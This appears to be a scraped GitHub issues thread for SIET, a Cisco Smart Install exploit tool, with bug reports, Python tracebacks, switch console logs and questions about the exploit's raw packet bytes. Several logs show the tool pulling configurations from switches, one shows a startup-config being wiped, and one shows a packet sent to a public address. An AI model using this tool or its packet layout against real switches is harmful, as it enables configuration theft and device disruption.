frostbits-security / siet Goto Github PK

This doesn't work on systems where python3 is the default version:

tftp = subprocess.Popen(["python", "sTFTP.py"])

https://github.com/Sab0tag3d/SIET/blob/master/siet.py#L311

When running the get config (-g) no config is actually downloaded.

If siet.py is run without arguments, instead of printing a summary of arguments, an error message is dumped:

# python siet.py 
Traceback (most recent call last):
  File "siet.py", line 350, in <module>
    main()
  File "siet.py", line 298, in main
    change_tftp(args.mode, current_ip)
  File "siet.py", line 206, in change_tftp
    my_ip = conn_with_client(None, current_ip)
  File "siet.py", line 129, in conn_with_client
    conn_with_host.connect((ip, 4786))
  File "/usr/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
TypeError: coercing to Unicode: need string or buffer, NoneType found
-= DvK =- TFTP server 2017(p)
root@ubuntu1804lts:~/SIET# [INFO]: Directory already exists. OK.
[INFO]: binding socket .. ok

When running the script with the -t test mode flag against a 3850 running IOS XE 3.06.06E it appears to corrupt the startup config on the switch. Running it with -g to grab the configuration does not corrupt the startup-config. Here is the output from the switch console when using the "-t" test mode:

*Aug 11 15:42:58.841: %SM-4-BADEVENT: Event 'ibcs_e_download_msg_req_recv' is invalid for the current state 'ibcs_s_accept': smi_ibc_serv SMI IBCS sm
-Traceback= 1#b69a38adc89ac4a752c53578658b267e :54F9C000+25EDFCC :54F9C000+CF83F4 :54F9C000+3B6AA10 :54F9C000+3B75078 :54F9C000+3B7E470 :54F9C000+3B7E520 :54F9C000+3B6B1EC :54F9C000+3F2C9DC
*Aug 11 15:42:58.849: %SM-4-BADEVENT: Event 'ibcs_e_download_msg_resp_send' is invalid for the current state 'ibcs_s_accept': smi_ibc_serv SMI IBCS sm
-Traceback= 1#b69a38adc89ac4a752c53578658b267e :54F9C000+25EDFCC :54F9C000+CF83F4 :54F9C000+3B6AB40 :54F9C000+3B75078 :54F9C000+3B7E470 :54F9C000+3B7E520 :54F9C000+3B6B1EC :54F9C000+3F2C9DC
*Aug 11 15:42:58.858: %SMI-6-UPGRD_STARTED: Device (IP address: 0.0.0.0) startup-config upgrade has started
Loading random_file from 192.168.1.2 (via GigabitEthernet0/0): !
[OK - 0 bytes]

*Aug 11 15:43:20.326: %SYS-5-CONFIG_NV_I: Nonvolatile storage configured from tftp://192.168.1.2/random_file by console

%Error opening tftp://192.168.1.2/random_file (Timed out)
%Error opening tftp://255.255.255.255/random_file (Timed out)
%Error opening tftp://255.255.255.255/random_file (Timed out)
%Error opening tftp://192.168.1.2/random_file (Timed out)
%Error opening tftp://192.168.1.2/random_file (Timed out)
%Error opening tftp://255.255.255.255/random_file (Timed out)
%Error opening tftp://255.255.255.255/random_file (Timed out)

switch#sh startup-config
Using 0 out of 2097152 bytes, uncompressed size = 0 bytes
%Error opening nvram:/startup-config (Uncompression Failed)

While using the siet.py, the malicious packet is successfully sent to the client running smart-install, however, there is no connection from the TFTP server to retrieve the configuration file. My attempt yielded the following output, however, without fetching the config.txt:-

[INFO]: Sending TCP packet to 192.168.32.5
-= DvK =- TFTP server 2017(p)
[INFO]: Directory already exists. OK.
[INFO]: binding socket .. ok
[INFO]: Package send success to 192.168.32.5 :
[INFO]: Getting config done
[INFO]: All done! Waiting 60 seconds for end of connections...
root@Kali:

# python siet.py -i 172.16.x.x -g
-= DvK =- TFTP server 2017(p)
[INFO]: Directory already exists. OK.
[INFO]: binding socket .. ok
[INFO]: Sending TCP packet to 172.16.x.x
[INFO]: Package send success to 172.16.x.x: 
[INFO]: Getting config done
[INFO]: All done! Waiting 60 seconds for end of connections...
[INFO]: connect from  172.16.x.x 1043
[INFO]:[172.16.x.x] puting file 172.16.x.x.conf octet
[INFO]:[172.16.x.x]:[put] success binding data port 44000
[INFO]:[172.16.x.x]:[put] file tftp/172.16.x.x.conf finish download, size: 12755
[INFO]: connect from 
Traceback (most recent call last):
  File "sTFTP.py", line 149, in <module>
    TftpServer('', TFTP_SOCK_TIMEOUT)
  File "sTFTP.py", line 43, in TftpServer
    print '[INFO]: connect from ', raddress, rport
UnboundLocalError: local variable 'raddress' referenced before assignment

Excellent work in writing this exploit, btw!

Hello sir,

Your exploit worked well on my machine, which I'm very happy to see good work

My question is though, what do these bytes mean? https://github.com/Sab0tag3d/SIET/blob/master/siet.py#L218-L222

Would you be able to provide some info on it?

I guess what exactly are these bytes doing, because unfortunately there is little information, and for another project, I'd like to provide more information to the users.

Could you please explain these tow tcp packets?
many Thanks!!

sTcp = '0' * 7 + '1' + '0' * 7 + '1' + '0' * 7 + '4' + '0' * 7 + '8' + '0' * 7 + '1' + '0' * 8
000000010000000100000004000000080000000100000000

resp = '0' * 7 + '4' + '0' * 8 + '0' * 7 + '3' + '0' * 7 + '8' + '0' * 7 + '1' + '0' * 8
000000040000000000000003000000080000000100000000

root@kali:~/Downloads/SIET-master# sudo python siet.py -t -g -i 192.168.1.3
sBindIp:
-= DvK =- TFTP server 2017(p)
[INFO]: Directory already exists. OK.
[INFO]: binding socket .. ok
[INFO]: Sending TCP packet to 202.228.24.53
[INFO]: Package send success to 202.228.24.53:
[INFO]: Getting config done
[INFO]: All done! Waiting 60 seconds for end of connections...

Hi! I noticed that different mode has different sTcp's initial value. So I am puzzled about variable sTcp's initial value, why do you construct it like that? Could you please tell me?

Thanks.